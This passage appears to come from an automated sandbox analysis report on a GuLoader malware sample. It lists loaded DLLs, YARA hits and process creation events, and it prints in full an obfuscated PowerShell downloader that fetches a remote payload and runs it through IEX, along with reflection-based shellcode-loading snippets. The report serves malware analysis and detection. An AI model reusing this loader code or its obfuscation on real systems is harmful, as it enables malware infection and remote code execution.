              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: m.pdbpdbtem.pdb source: powershell.exe, 00000001.00000002.1907996504.000001DED9F10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdbwq source: powershell.exe, 00000006.00000002.2123074697.000000000724C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: t.Automation.pdb% source: powershell.exe, 00000001.00000002.1944275574.000001DEF3F22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2090574709.0000000002A61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: hqm.Core.pdb source: powershell.exe, 00000006.00000002.2123074697.000000000724C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2090574709.0000000002A61000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Fain", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000006.00000002.2132748645.0000000008DD5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2132213145.0000000008610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2113399982.0000000005665000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Suku)$GlObAL:kONSumPtiOn = [SysTEm.TExt.enCoDIng]::asCII.GeTsTRing($cORIOLanuS)$GlobAl:sulFonerER=$kOnSUMPtiON.subSTRIng($gErsHWiN,$RUNOlOgs)<#forurenede Immuniseringernes Frkenklost
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Experientialistic $Fedtkirtelen $Eksklusionen), (Idssdramaets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hexonic = [AppDomain]::CurrentDomain.GetAssem
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Brenden)), $Renteindtgts).DefineDynamicModule($Brugerdefineret, $false).DefineType($Gambrelled, $Oaring, [System.MulticastDelegate])$S
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Suku)$GlObAL:kONSumPtiOn = [SysTEm.TExt.enCoDIng]::asCII.GeTsTRing($cORIOLanuS)$GlobAl:sulFonerER=$kOnSUMPtiON.subSTRIng($gErsHWiN,$RUNOlOgs)<#forurenede Immuniseringernes Frkenklost
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagk
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagk
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8A815F push ebx; ret 1_2_00007FFD9B8A816A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0739AD52 push esi; ret 6_2_0739AD57
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
